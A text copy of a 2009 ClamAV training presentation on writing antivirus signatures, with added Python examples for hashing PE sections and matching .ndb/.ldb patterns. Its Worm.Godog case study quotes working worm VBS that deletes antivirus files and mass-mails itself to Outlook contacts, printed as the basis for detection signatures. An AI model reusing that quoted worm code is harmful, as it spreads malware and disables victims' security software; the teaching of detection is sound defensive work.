7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 1/35
Writing ClamAV Signatures
Alain Zidouemba, March 4, 2009
About the presenter
Alain Zidouemba
• VRT Research Engineer for over a year
• Primary responsibilities:
• Malware research & signature generation – ClamAV
• Vulnerability research & rules generation – Snort
• Before Sourcefire: Anti-Malware Research Engineer
Outline
What is ClamAV
Where to get ClamAV
Different ClamAV signature formats:
• .hdb
• .mdb
• .ndb
• .ldb
Whitelisting
Q & A
What is ClamAV?
Clam AntiVirus (ClamAV) is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways
Provides a number of utilities including:
• A flexible and scalable multi-threaded daemon (clamd)
• A command line scanner (clamscan)
• An advanced tool for automatic database updates (freshclam)
• Sigtool – more later
Where can I get ClamAV from?
Latest stable release: ClamAV 0.94.2
• http://www.clamav.net/download/sources
Most popular UNIX operating systems are supported:
• GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X
Up-to-date list of binary packages is available at our website:
• http://clamav.net/download/packages
Why learn how to write sigs?
I thought Sourcefire released signature updates several times a day!
ClamAV malware detection
Goal: recognize and block malware
Detection is:
• File-centric
• Focus on recognizing malicious code in a file
Not intended to replace desktop AV
First line of defense
ClamAV Virus Database (CVD)
The ClamAV project distributes two CVD files
• main.cvd
• daily.cvd
Sigtool (ships with ClamAV) can display detailed information on CVD files:
Various signature files in the .cvd archive
Writing signatures for ClamAV
Hash database: *.hdb
The format for .hdb files is as follows:
• MD5:Size:MalwareName
To create a signature for test.exe use the --md5 option of sigtool:
Hash database: *.hdb (cont’d)
That’s it! The signature is ready to be used:
• The name for the detection can be changed:
MD5, PE-section based: *.mdb
The format for .mdb files is as follows:
• PESectionSize:MD5:MalwareName
The easiest way to generate MD5-based section signatures is to extract target PE sections into separate files and then run sigtool with the option --mdb:
Case study: Trojan.Bagle-328
IDA Pro indicates that the sample is “packed”
Packed with Themida (as per PEiD)
Case study: Trojan.Bagle-328 (cont'd)
Themida is used by malware writers... but also by legitimate products, so a signature on the packer code would likely cause false positives
We can use pe-sig, a Ruby script that will create sigs for each section of a PE file:
Finally, the signature is:
• 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328
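As an added example (not part of the presentation, and not the code of sigtool or pe-sig), the Python below derives what `sigtool --md5` and `sigtool --mdb` print: a whole-file MD5:Size entry for an .hdb file, and per-section size and MD5 pairs for an .mdb file by walking the PE section table. `build_toy_pe` constructs a minimal PE in memory so the example runs offline; the section names, section bodies and the detection name Trojan.Toy are made up.

```python
import hashlib
import struct

# .hdb entry, MD5:Size:MalwareName over the whole file (what `sigtool --md5` prints).
def hdb_entry(data, name):
    return "%s:%d:%s" % (hashlib.md5(data).hexdigest(), len(data), name)

# Walk the PE section table and return (name, raw_size, md5) for each section's raw
# bytes: the inputs an .mdb entry (PESectionSize:MD5:MalwareName) is built from.
def pe_sections(data):
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                 # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsect = struct.unpack_from("<H", data, pe + 6)[0]            # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]        # COFF SizeOfOptionalHeader
    table = pe + 24 + opt_size                                   # section headers, 40 bytes each
    out = []
    for i in range(nsect):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8s4I", data, table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        out.append((name.rstrip(b"\0").decode(), raw_size, hashlib.md5(raw).hexdigest()))
    return out

def mdb_entries(data, name):
    return ["%d:%s:%s" % (size, md5, name) for _sect, size, md5 in pe_sections(data)]

# Constructed minimal PE (no optional header, sections 512-byte aligned) so the example
# runs offline; real samples would be read from disk instead.
def build_toy_pe(sections):
    pe_off = 0x40
    raw_ptr = (pe_off + 24 + 40 * len(sections) + 0x1FF) & ~0x1FF
    table, bodies = b"", b""
    for i, (name, body) in enumerate(sections):
        table += struct.pack("<8s4I", name, len(body), 0x1000 * (i + 1), len(body), raw_ptr)
        table += b"\0" * 16                                      # remaining header fields unused
        raw_ptr, bodies = raw_ptr + len(body), bodies + body
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    head = dos + coff + table
    return head + b"\0" * (raw_ptr - len(bodies) - len(head)) + bodies

TOY_PE = build_toy_pe([(b".text", b"\x55\x8b\xec" * 100), (b".data", b"abc")])
```

Changing the .data section changes the whole-file .hdb entry but leaves the .text entry from `mdb_entries` untouched, which is why a section hash survives repacking of unrelated sections.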
Extended sig. format: *.ndb
The format for .ndb files is as follows:
• MalwareName:TargetType:Offset:HexSignature
TargetType is one of the following numbers specifying the type of the target file:
0: Any file
1: Portable Executable
2: OLE2 component (e.g. VBA script)
3: HTML (normalized)
4: Mail file
5: Graphics
6: ELF
7: ASCII text file (normalized)
Case study: Trojan.Exchanger
Many files that are very similar yet different
Case study: Trojan.Exchanger (cont’d)
5.exe:
Opcode:
• e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Case study: Trojan.Exchanger (cont’d)
7.exe:
Opcode:
• e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Case study: Trojan.Exchanger (cont’d)
Signature for 5.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature for 7.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature to detect both 5.exe and 7.exe ({4} matches exactly four bytes of any value, covering the differing operand):
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
Case study: Trojan.Exchanger (cont’d)
Moreover, for 5.exe:
• EP: 0x4094E0
• Binary string: 0x4095C5
For 7.exe:
• EP: 0x406D87
• Binary string: 0x406E6C
In both cases the distance between EP and our binary string is the same: 0xE5 = 229 (decimal)
Case study: Trojan.Exchanger (cont’d)
Finally we can rewrite the signature to be:
• Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
This signature is more precise and even matches other samples:
Logical signatures: *.ldb
Logical signatures were introduced in ClamAV 0.94. The format for .ldb files is as follows:
• SignatureName;TargetDescriptionBlock;LogicalExpression;Subsig0;Subsig1;Subsig2;...
Case study: Worm.Godog
A mass-mailer worm, code is in VBS
Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro &"\Kaspersky Lab\Kaspersky Antivirus Personal Pro"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")
If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro &"\Kaspersky Lab\Kaspersky Antivirus Personal"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")
if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro"
legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")
if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal"
legions.DeleteFile (Registro & "\AVPersonal\*.*")
if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98"
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")
Case study: Worm.Godog (cont'd)
After normalization, we can create 4 signatures to detect each attempt to disable AV tools as follows:
(0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
{-100}2e64656c65746566696c652028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
(1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
(2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028
{-25}202620225c6176706572736f6e616c
(3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e
{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e
Case study: Worm.Godog (cont'd)
The worm also sends itself to the first 8000 contacts found in the address book:
Set Create = CreateObject ("Scripting.FileSystemObject")
Set mail = Create.CreateTextFile("C:\mail.vbs")
mail.writeline "On Error Resume Next"
mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"
mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"
mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"
mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"
mail.writeline "For A = 1 To Mail.AddressLists.Count"
mail.writeline "Set B = Mail.AddressLists (A)"
mail.writeline "Counter = 1"
mail.writeline "Set C = leg.CreateItem (0)"
mail.writeline "For D = 1 To B.AddressEntries.Count"
mail.writeline "E = B.AddressEntries (Counter)"
mail.writeline "C.Recipients.Add E"
mail.writeline "Counter = Counter + 1"
mail.writeline "If Counter > 8000 Then Exit For"
mail.writeline "Next"
mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)
mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)
mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)
mail.writeline "C.DeleteAfterSubmit = True"
mail.writeline "C.Send"
mail.writeline "Next"
mail.Close
legion.Run ("C:\mail.vbs")
Case study: Worm.Godog (cont'd)
A signature to detect this mailing portion of the worm could be:
(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74
{-100}726563697069656e74732e616464{-100}696620{-10}203e20
{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464
{-150}2e73656e64
Finally, we can write this highly flexible signature:
• Worm.Godog;Target:0;((0|1|2|3)&(4));(0);(1);(2);(3);(4)
In a .ldb file:
Worm.Godog;Target:0;((0|1|2|3)&(4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
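As an added example (not from the slides and not ClamAV's own matcher), the Python below implements the subset of the .ndb and .ldb formats used on the slides: it compiles hex bodies with {n}, {-n}, {n-}, {n-m} and * wildcards into regular expressions, applies the *, absolute and EP+n offsets from the Trojan.Exchanger case study, and evaluates a logical expression over subsignatures as in the Worm.Godog case. The samples are constructed: the Exchanger opcode strings from the slides placed at a made-up entry point, and a reduced Godog signature built from only subsignatures (2), (3) and (4) above, run over a lower-cased VBS fragment in the shape of the normalized worm.

```python
import re

# Hex body -> bytes regex. Wildcards as on the slides: {n} exactly n bytes, {-n} up to n, {n-} at least n, {n-m} a range, * any gap.
def hex_to_regex(body):
    parts = []
    for tok in re.split(r"(\{[^}]*\}|\*)", body):
        if tok == "*":
            parts.append(b".*")
        elif tok.startswith("{"):
            lo, dash, hi = tok[1:-1].partition("-")
            lo, hi = lo or "0", (hi if dash else lo)   # "{4}" -> 4..4, "{-25}" -> 0..25
            parts.append(b".{%s,%s}" % (lo.encode(), hi.encode()))
        elif tok:
            parts.append(re.escape(bytes.fromhex(tok)))
    return re.compile(b"".join(parts), re.DOTALL)

# .ndb: MalwareName:TargetType:Offset:Hex. Offset is *, an absolute n, or EP+n / EP-n (target type not checked here).
def ndb_match(sig, data, ep=0):
    _name, _target, offset, body = sig.split(":", 3)
    rx = hex_to_regex(body)
    if offset == "*":
        return rx.search(data) is not None
    pos = ep + int(offset[2:]) if offset.startswith("EP") else int(offset)
    return rx.match(data, pos) is not None

# .ldb: Name;TargetDescription;LogicalExpr;Sub0;Sub1;...  Only the | and & subset on the slides; the whitelist bounds what eval sees.
def ldb_match(sig, data):
    fields = sig.split(";")
    hits = [hex_to_regex(s).search(data) is not None for s in fields[3:]]
    if not re.fullmatch(r"[\d()|& ]+", fields[2]):
        raise ValueError("unsupported logical expression: " + fields[2])
    pyexpr = re.sub(r"\d+", lambda m: "hits[%s]" % m.group(), fields[2])
    return bool(eval(pyexpr, {"__builtins__": {}}, {"hits": hits}))

# Constructed samples: Exchanger opcodes from the slides 229 bytes past a made-up entry point, and a Godog-shaped VBS fragment.
EP = 0x40
OP5 = bytes.fromhex("e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4")
OP7 = bytes.fromhex("e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4")
SAMPLE5, SAMPLE7 = (b"MZ" + b"\x90" * (EP + 227) + op + b"\xcc" * 8 for op in (OP5, OP7))
EXCHANGER = "Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4"
GODOG = ("Worm.Godog;Target:0;((0|1)&(2));"            # subsigs (2), (3) and (4) of the slides
         "66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;"
         "66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;"
         "666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64")
VBS = (b'if fileexists (registro & "\\avpersonal\\avguard.exe") then path = registro & "\\avpersonal"\n'
       b'legions.deletefile (registro & "\\avpersonal\\*.*")\n'
       b'mail.writeline "for d = 1 to b.addressentries.count"\nmail.writeline "c.recipients.add e"\n'
       b'mail.writeline "if counter > 8000 then exit for"\nmail.writeline "c.attachments.add" & chr(34)\n'
       b'mail.writeline "c.send"\n')
```

With the EP+229 offset the Exchanger signature matches both constructed samples only when the right entry point is supplied, and the reduced Godog signature fires on the fragment because the AVPersonal subsignature and the mailer subsignature both hit, but not on the mailer lines alone.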
Whitelisting
To whitelist a specific file create an entry in a database file with the extension .fp following the MD5 signature format:
• MD5:FileSize:Comment
Whitelisting (cont’d)
To whitelist a specific signature inside main.cvd add the following entry into a local file local.ign:
• db_name:line_number:signature_name
To ignore the “myTestSignature” at line 23 in test.ndb:
• test.ndb:23:myTestSignature
Daily.ign:
More questions?
[email protected] - user questions
[email protected] - technical discussions
Alternatively you can try asking on the #clamav IRC channel on irc.freenode.net
If you have questions or comments on this presentation: [email protected]
ClamAV/VRT/Sourcefire
Websites
• http://www.clamav.net
• http://www.snort.org
• http://www.sourcefire.com
Blogs
• http://clam-av.blogspot.com
• http://vrt-sourcefire.blogspot.com
Contribute
Sample submission
• http://www.clamav.net/sendvirus/
Upload statistics:
• freshclam --submit-stats
Bug submission
• http://bugs.clamav.net
Q & A
NOW GO AND WRITE